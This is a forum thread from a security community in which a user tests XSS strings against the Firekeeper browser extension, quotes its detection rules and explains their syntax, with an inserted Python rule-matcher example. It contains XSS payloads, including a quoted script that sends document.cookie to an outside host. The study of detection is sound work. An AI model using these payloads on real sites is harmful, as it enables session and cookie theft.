Author Topic: Put your firekeeper extension to the test with XSS and learn by the process...  (Read 5464 times)


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34049
  • malware fighter
Hi malware fighters,

Here we have some malscript codes that are being flagged by Firekeeper in the Mozilla browser.
Sometimes when you find code online, it is a good policy to feed it into the Google search engine and see if Firekeeper alerts and flags the exploit attempts. In this process one learns about malcode and to what purpose it is abused, to detect it better and be better protected against it.
I give you two examples:

I give them with their alerts:
1
%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28d script alert 'Name or service not known'
part of === Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
&
2
%22%3E%3C%2Fscript%3E%3Cscript%3Eal
=== Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
A description of how the second exploit is used can be found here:
http://www.ernw.de/content/e6/e179/index_ger.html
and here: http://www.xssed.com/mirror/23934/

Very interesting read here: http://www.pointblanksecurity.com/xss/

polonus

« Last Edit: June 04, 2010, 12:11:47 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

Hi malware fighters,

Now the following one has not flagged anything with Firekeeper:
<script>alert(document.location)</script>
XSS Example: PHPnuke
Reflected attack
Requires social engineering: http://www.phpnuke.org/user.php?op=userinfo&uname=<script>alert(document.cookie);</script>

polonus

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 76016
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
It's all about learning and knowledge, trying to keep the pace of the bad guys... ;)
asyn
W8.1 [x64] - Avast Free AV 23.3.8047.BC [UI.757] - Firefox ESR 102.9 [NS/uBO/PB] - Thunderbird 102.9.1
Avast-Tools: Secure Browser 109.0 - Cleanup 23.1 - SecureLine 5.18 - DriverUpdater 23.1 - CCleaner 6.01
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

Offline polonus

Hi malware fighters,

See what your User Agent reveals: http://useragentstring.com/Googlebot2.1_id_1697.php
But as I pose with User Agent Switcher, it is shown when analyzed:
http://useragentstring.com/Googlebot2.1_id_108.php
Entering a script as User Agent (look with BotsVsBrowsers) gives conflicting results and a tag from Lithuania:
<script>document.print('<img href=”http://55329.glrdmd.eu/admin/2.php?q='+document.cookie);</script>
and this as URL: http://55329.glrdmd.eu/admin/2.php?q=\'
(see http://www.botsvsbrowsers.com/details/158115/index.html)
Enough to ponder on, to analyze, and to get a feel for what goes on under the hood of your browser,
and also learn from our past: http://webaim.org/blog/user-agent-string-history/

polonus
« Last Edit: August 01, 2010, 12:41:45 AM by polonus »

Offline polonus

Hi malware fighters,

Another couple of examples where using the characters instead may fool the filters and allow XSS to work, some detection rules, and examples fully decoded, where we used this tool to see what it has in store for us once unpacked: http://www.strictly-software.com/unpack-javascript.aspx

For the fans I have attached the examples in a txt file,

polonus
« Last Edit: August 01, 2010, 09:11:18 PM by polonus »

Offline polonus

Hi malware fighters,

Here was another interesting test-site: http://webblaze.org/dbates/

I give some examples of how it was flagged in my browser in the attached txt file; the rest of the testing can be done by users here that have Firefox or Flock with Firekeeper, NoScript and the Netcraft toolbar installed. They should nip all these attempts in the bud,

polonus


Offline polonus

Hi malware fighters,

A very nice article about the threat of XSS vulnerabilities on a website is here:
http://blogs.apache.org/infra/entry/apache_org_04_09_2010
Every leak means a potential threat when valuable information resides on a particular website. The effect of an XSS leak is directly related to the nature of that website (valuable data). For website owners, input validation and the secure use of PHP, Perl, etc. are measures they should take against XSS, SQL attacks and buffer overflows; the consumer can feel secure with NoScript active in the browser, as the XSS attack will have ended before it has begun,

polonus

Offline polonus

Hi malware fighters,

Here is another list that I tested against Firekeeper detection: http://labs.securitycompass.com/wp-content/uploads/xssme/xssme_extended_strings.xml

As an example, one of them flagged as:
=== Triggered rule ===
alert(url_content:"%3C"; url_content:"%22"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and %22. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://api.search.yahoo.com/WebSearchService/V1/webSearch?appid=flock-search&query=%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCR%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27IPT+SRC%3Dhttp%3A%2F%2Fwww.securitycompass.com%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--&zip=&start=1&results=4&region=fr&fr=flo2

Resource: http://attackvectors.com/code/XSS.txt

polonus
« Last Edit: August 07, 2010, 11:06:08 PM by polonus »

Offline polonus

Howdy malware fighters,

Another nice link here: http://www.sk-typo3.de/index.php?id=370
and another here: http://www.maht0x0r.net/library/computing/xssAttacks.html
dangerous strings: http://subversion.assembla.com/svn/telbook/trunk/vendors/dummydata/files/dangerous_strings.dat

One example of a rule flagged by Firekeeper:
=== Triggered rule ===
alert(url_content:"%3C"; url_content:"%22"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and %22. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://api.search.yahoo.com/WebSearchService/V1/webSearch?appid=flock-search&query=%3CDIV+STYLE%3D%22background-image%3A+url%28javascript%3Aalert%28%27XSS%27%29%29%22%3E&zip=&start=1&results=4&region=fr&fr=flo2

Click the above link and you will get an XSS warning through the NoScript extension (if you have that installed).

About making up your own Firekeeper rules: Firekeeper rules are made of two parts: rule header and rule options. The header defines three actions that can be taken whenever a rule match is detected: pass, drop, and alert. Whenever a 'pass' action rule match occurs, it allows processing of HTTP traffic without going for any further checks. Likewise, 'drop' action blocks all traffic without any user intervention, and 'alert' generates an Alert window.

The rule options describe what should trigger an action and other information about the rule. There are three choices: url_content, headers_content, and body_content. Creating a rule is simple: open a text file and write

alert(msg:"attack detected"; body_content:"clsid|3A"; nocase;)

In the body_content tag specify the content that you want to scan in the incoming traffic, and in the msg tag define the message that should be displayed when such content is detected. The nocase tag signifies that the content specified in the body_content tag will be searched without any arguments,

polonus
« Last Edit: August 08, 2010, 07:40:33 PM by polonus »
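Added example, written for this thread and not code from Firekeeper or from polonus: a small Python matcher for rules in the shape quoted above. It covers the two things the thread keeps coming back to. First, the point of the opening post: a payload typed into a search box reaches the server percent-encoded, which is the form that `url_content:"%3CSCRIPT"` and `url_re:"/%3Cscript.*%3E/i"` are written against, so the rule fires on the encoded Google and Yahoo request URLs quoted in this thread. Second, the header and option syntax described in the post just above (pass/drop/alert, url_content, headers_content, body_content, msg, nocase). The option grammar is inferred from the rules quoted in this thread, not taken from Firekeeper's source. Constructed assumptions: the `|XX|` hex escape is borrowed from Snort rule syntax, the `headers_content` rule, the `example.invalid` URL and the header block are made up for the demo, and the `normalize_url` step (decode, then re-encode, so a raw `<` is seen as `%3C`) is this example's own answer to the "using the characters instead may fool the filters" remark earlier in the thread; Firekeeper itself is not claimed to do that.

```python
import re
from urllib.parse import quote, unquote

# A Firekeeper rule has a header (pass | drop | alert) and parenthesised options,
# written like a Snort rule:  alert(option:"value"; flag; ...)
RULE_RE = re.compile(r"^\s*(pass|drop|alert)\s*\((.*)\)\s*$", re.S)
# One option: name, optional ':value' (double-quoted or bare), ';' terminator.
OPT_RE = re.compile(r'(\w+)\s*(?::\s*("(?:[^"\\]|\\.)*"|[^;]*))?\s*;')


def _decode_content(value):
    """Expand Snort-style |XX| hex escapes ('clsid|3A|' -> 'clsid:'); an
    unterminated pipe, as in the post's 'clsid|3A', is kept literally."""
    return re.sub(r"\|([0-9A-Fa-f ]+)\|",
                  lambda m: bytes.fromhex(m.group(1)).decode("latin-1"), value)


def parse_rule(text):
    """Parse one rule into a dict: action, msg, nocase, url_re and the three
    content lists (url_content, headers_content, body_content)."""
    m = RULE_RE.match(text)
    if not m:
        raise ValueError("not a Firekeeper-style rule: %r" % text)
    rule = {"action": m.group(1), "msg": "", "nocase": False, "url_re": None,
            "url_content": [], "headers_content": [], "body_content": [],
            "references": []}
    for name, value in OPT_RE.findall(m.group(2)):
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]          # strip the surrounding quotes
        if name == "nocase":
            rule["nocase"] = True
        elif name == "msg":
            rule["msg"] = value
        elif name == "reference":
            rule["references"].append(value)
        elif name == "url_re":
            # value looks like /pattern/flags; only the 'i' flag is supported here
            body, _, flags = value.rpartition("/")
            rule["url_re"] = re.compile(body.lstrip("/"), re.I if "i" in flags else 0)
        elif name in ("url_content", "headers_content", "body_content"):
            rule[name].append(_decode_content(value))
        else:
            raise ValueError("unknown rule option %r" % name)
    return rule


def _contains(haystack, needle, nocase):
    return needle.lower() in haystack.lower() if nocase else needle in haystack


def match_rule(rule, url, headers="", body=""):
    """True when every content option and the url_re of the rule match."""
    for haystack, needles in ((url, rule["url_content"]),
                              (headers, rule["headers_content"]),
                              (body, rule["body_content"])):
        if not all(_contains(haystack, n, rule["nocase"]) for n in needles):
            return False
    return rule["url_re"] is None or rule["url_re"].search(url) is not None


def normalize_url(url):
    """Percent-decode, then re-encode, so a raw '<' in a URL looks like the
    '%3C' the rules are written against. Constructed step, not Firekeeper's."""
    return quote(unquote(url), safe="/:?&=+#,@;!$'()*")


def evaluate(rules, url, headers="", body=""):
    """Return (action, msg) for each rule firing on the request as sent or on
    its normalized URL."""
    return [(r["action"], r["msg"]) for r in rules
            if match_rule(r, url, headers, body)
            or match_rule(r, normalize_url(url), headers, body)]


# Two rules quoted in this thread plus one constructed headers_content rule for
# the 'script as User Agent' experiments (not a Firekeeper stock rule).
RULE_TEXTS = [
    'alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html;)',
    'alert(url_content:"%3C"; url_content:"%22"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and %22. Suspiciously HTML-like.";)',
    'alert(headers_content:"<script"; nocase; msg:"script tag in a request header (constructed rule)";)',
]

# Request URLs: two taken from the thread's alerts, one constructed raw variant.
SAMPLE_URLS = {
    "google_encoded": "http://www.google.com/search?client=flock&channel=fds&q=%3E%3Cscript%3Ealert%28%E2%80%98XSS%27%29&ie=utf-8&oe=utf-8&aq=t",
    "yahoo_div": "http://api.search.yahoo.com/WebSearchService/V1/webSearch?appid=flock-search&query=%3CDIV+STYLE%3D%22background-image%3A+url%28javascript%3Aalert%28%27XSS%27%29%29%22%3E&zip=&start=1&results=4&region=fr&fr=flo2",
    "raw_unencoded": "http://example.invalid/search?q=<script>alert(document.location)</script>",
}
# Constructed header block carrying the UA string from the BotsVsBrowsers test.
SAMPLE_HEADERS = "Host: example.invalid\r\nUser-Agent: <script>alert(/xss/)</script>\r\n"


def run_samples():
    """Evaluate every sample URL (plus the sample headers for the raw one)."""
    rules = [parse_rule(t) for t in RULE_TEXTS]
    return {name: evaluate(rules, url, SAMPLE_HEADERS if name == "raw_unencoded" else "")
            for name, url in SAMPLE_URLS.items()}


if __name__ == "__main__":
    for name, hits in run_samples().items():
        print(name, "->", [msg for _, msg in hits] or "no alert")
```

The Google URL trips only the `%3CSCRIPT` rule (no `%22` in it), the Yahoo DIV URL trips only the three-character rule (no `%3CSCRIPT` in it), which is the same split the alerts quoted in this thread show. The raw `<script>` URL misses the `%3CSCRIPT` rule as sent and is caught only through `normalize_url`, which is the whole argument for matching on a canonical form rather than on whatever encoding the request happened to arrive in.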

Offline polonus

Hi malware fighters,

Let us test again:
><script>alert(‘XSS')
We get this alert with the Firekeeper extension:
=== Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://www.google.com/search?client=flock&channel=fds&q=%3E%3Cscript%3Ealert%28%E2%80%98XSS%27%29&ie=utf-8&oe=utf-8&aq=t
Then the Netcraft toolbar warns; if ignored, we get another Firekeeper warning:
=== Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://pmw90687.surfcanyon.com/queryReformulation?partner=wot&authCode=pmw90687&format=jsonp&callback=contentscript.callback1&q=%3E%3Cscript%3Ealert(%E2%80%98XSS%27)

Now we are going to see how this can be used as a browser agent here: http://www.botsvsbrowsers.com/details/187425/index.html
If we are to test the User Agent we again get a Firekeeper alert:
=== Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://www.botsvsbrowsers.com/SimulateUserAgent.asp?UserAgent=%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E

Again we have to ignore several warnings, allow the request with NoScript and RequestPolicy extension and the webpage we request is shown as seen through this bot.
I ran a Fiddler session under it and here I like to stress the following: http://botsversusbrowsers.com/SimulateUserAgent.asp?UserAgent=%3CScript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E

If you like you can use it as a User Agent in User Agent Switcher, an extension for the Firefox and Flock browsers. Sometimes this can also be a way to avoid browser bugs,

polonus


« Last Edit: August 31, 2010, 11:47:58 PM by polonus »